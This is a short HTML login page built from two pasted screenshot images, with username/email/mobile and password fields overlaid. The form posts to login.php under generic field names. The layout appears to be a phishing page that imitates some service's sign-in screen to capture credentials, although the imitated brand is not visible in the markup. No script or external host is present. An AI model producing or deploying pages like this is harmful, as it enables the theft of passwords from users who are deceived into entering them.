<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Login - Account </title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1348px; height:653px; z-index:0"><img src="images/paste215.jpg" alt="" title="" border=0 width=1348 height=653></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:618px; width:1346px; height:85px; z-index:1"><img src="images/paste216.jpg" alt="" title="" border=0 width=1346 height=85></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:301px;left:837px;top:115px;z-index:3;height: 61px;" placeholder="Username,Email, or Mobile">
<input name="formtext2" type="password" style="position:absolute;width:301px;left:837px;top:181px;z-index:4;height: 61px;" placeholder="Password">
<div id="formimage1" style="position:absolute; left:923px; top:311px; z-index:5"><input type="image" name="formimage1" width="126" height="65" src="images/sibtn.PNG"></div>
</form>


</body>
</html>
